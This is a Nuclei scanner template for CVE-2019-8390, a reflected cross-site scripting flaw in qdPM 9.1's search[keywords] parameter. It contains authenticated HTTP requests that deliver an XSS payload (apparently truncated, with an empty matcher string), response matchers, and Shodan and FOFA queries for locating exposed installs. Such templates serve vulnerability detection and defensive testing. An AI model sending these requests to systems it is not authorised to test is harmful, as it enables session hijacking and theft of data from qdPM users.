id: CVE-2019-8390 info: name: qdPM 9.1 - Cross-site Scripting author: theamanrawat severity: medium description: | qdPM 9.1 suffers from Cross-site Scripting (XSS) in the search[keywords] parameter. impact: | Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of qdPM or apply the necessary security patches provided by the vendor. reference: - https://www.exploit-db.com/exploits/46399/ - http://qdpm.net/download-qdpm-free-project-management - https://nvd.nist.gov/vuln/detail/CVE-2019-8390 - http://sourceforge.net/projects/qdpm - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-8390 cwe-id: CWE-79 epss-score: 0.01911 epss-percentile: 0.88548 cpe: cpe:2.3:a:qdpm:qdpm:9.1:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: qdpm product: qdpm shodan-query: http.favicon.hash:762074255 fofa-query: icon_hash=762074255 tags: cve,cve2019,xss,qdpm,authenticated,edb http: - raw: - | GET /index.php/login HTTP/1.1 Host: {{Hostname}} - | POST /index.php/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded login%5B_csrf_token%5D={{csrf}}&login%5Bemail%5D={{username}}&login%5Bpassword%5D={{password}}&http_referer= - | POST /index.php/users HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded search[keywords]=e">&search_by_extrafields[]=9 matchers-condition: and matchers: - type: word part: body words: - '' - 'alert alert-info alert-search-result' condition: and - type: word part: header words: - 'text/html' - type: status status: - 200 extractors: - type: regex name: csrf group: 1 regex: - 'name="login\[_csrf_token\]" value="(.*?)"' internal: true part: body # digest: 4a0a00473045022100fc087db4244c0b047911c00cc9fb5db15ae8cb82bf20bcb1a1cdf041f95e033802202a2995b1aa3230d1e5e50e1e13d8d2ebdeaa6bf6b3c594e11f226fe00af16103:922c64590222798bb761d5b6d8e72950